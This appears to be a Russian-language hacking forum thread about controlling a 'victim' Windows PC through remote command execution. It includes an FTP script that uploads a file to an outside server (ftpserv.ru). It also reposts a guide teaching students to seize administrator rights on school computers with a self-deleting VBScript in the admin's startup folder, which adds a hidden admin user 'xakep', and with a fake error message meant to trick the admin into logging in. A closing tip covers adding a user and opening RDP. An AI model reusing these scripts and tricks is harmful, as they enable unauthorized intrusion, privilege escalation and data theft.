Вобщем есть возможность выполнения cmd на удалённой машине, под виндой.. распишите пожалуйста как допустим закачать и запустить exe файл?
ещё вариант: Поднять у себя ftp-сервер. Запустить на компе-жертве клиента ftp. Законнектится к серверу (open server_nameort) и сделать get file_name.
фтп должен быть не через пассивный режим. ftp -s:123.ftp в 123.ftp пишем: OPEN ftpserv.ru user pass put C:\porno.zip bye
Code: Прива вам школьники и студенты! Я хочу дать вам несколько полезных советов к началу учебного года. Я более чем уверен, что вас уже достала ваша учетная запись с ограниченными правами на виндах 2k NT или XP и вам хочется больше, намного больше! В вашем учебном заведении наверняка есть злые дядьки, которых называют админами, и только эти негодяи знают пассы на элитные учетные записи. Просто падонки, не правда ли? Мы это исправим, более того, мы их свергнем, а вы будете новым королём с большими привилегиями. Итак, что нам для этого нужно? Лишь 5-10 минут провести за нужным нам компом, что бы на нём был хотя бы один текстовый редактор и целый запас желания получить админскую учетку. Весь этот способ основан на WSH, лучшего пожалуй средсвта для компьютерного западла в виндах (смотри ][ 36 выпуск!). Ни для кого не секрет, что админы логятся на тачках со своей учетной записью (да часто с таким гордым видом)... От этого и будем плясать. Сначала нам потребуется написать простой скриптик "Действия I (урвать хоть что-нибудь)". Sub helo(admin, Wait) Set WshShell=WScript.CreateObject("WScript.Shell") X=WshShell.Run(admin,Wait) End Sub Call helo("C:\windows\system32\net.exe user xakep 1111 /add", True) \\\ тут мы добавляем юзера xakep c паролем 1111 Call helo("C:\windows\system32\net.exe localgroup Администраторы xakep /add", True) \\\ тут наш юзер становится настоящим админом !!! и назовем наше творение admin.vbs. Да всё это просто замечательно, только прав у нас маловато. А вот прав админчика нам как раз хватит, поскольку ключ реестра HKEY_LOCAL_MACHINE нам не доступен у нас не получится заставить грузится этот скрипт у всех юзеров. А зачем нам лишние заморочки, мы будем делать проще, мы просто откроем путь c:\Documents and Settings\Администратор\Главное меню\Программы\Автозагрузка\ и нежно и аккуратно положим туда наш скрипт. Тут возникает другой вопрос - а вдруг админ его заметит... Не заметит, в конце скрипта добавляем следующее: Set Killer=CreateObject("Scripting.FileSystemObject") Killer.DeleteFile(" C:\Documents and Settings\Администратор\ Главное меню\Программы\Автозагрузка\ admin.vbs") (главное помнить, что админ может использовать не встроенную учетную запись "Администратор", а что-нибудь поудобнее, но я вас уверяю, с правами он себя никогда не обделит). И после того, как админ войдёт в систему под своим аккаунтом все дело будет сделано, а как заставить его это сделать я расскажу в конце. Итак, собственный админский аккаунт у нас уже есть, но что мешает настоящему админу его удалить... Это тоже поправимо, делаем следующее. Заходим в командную строку и набиваем "net localgroup Администраторы" - смотрим кто же у нас имеет права админить, записываем или запоминаем... Действие II ( прощай админ, не поминай лихом). Пишем примерно такой же скрипт ; Sub helo(admin, Wait) Set WshShell=WScript.CreateObject("WScript.Shell") X=WshShell.Run(admin,Wait) End Sub Call helo("C:\windows\system32\net.exe user Администратор 1111 /add", True) Действие III (админ иди работай) Теперь как же быть с толстыми и ленивыми админами, которым влом хотя бы раз в неделю проверить комп? Их придётся заставить тащить свою задницу к тачке и логинится адинской записью. Надо так надо... К примеру пусть выскакивает мессага о какой-нибудь злой ошибке (это я полностью украду из их журнала выпуска 36) - тоже небольшой скриптик, который мы поместим в реестре на этот раз: Hacker = MsgBox("тут вы впишите чтонибудь заумное и страшное например "Explorer.exe не может получить доступ к памяти 0x77e626ba", 20, "System error") (с) не моё
Вобщем, если внешний айпи - создай юзера через net user. Потом через ту же cmd открой RDP. Подробнее - гугл.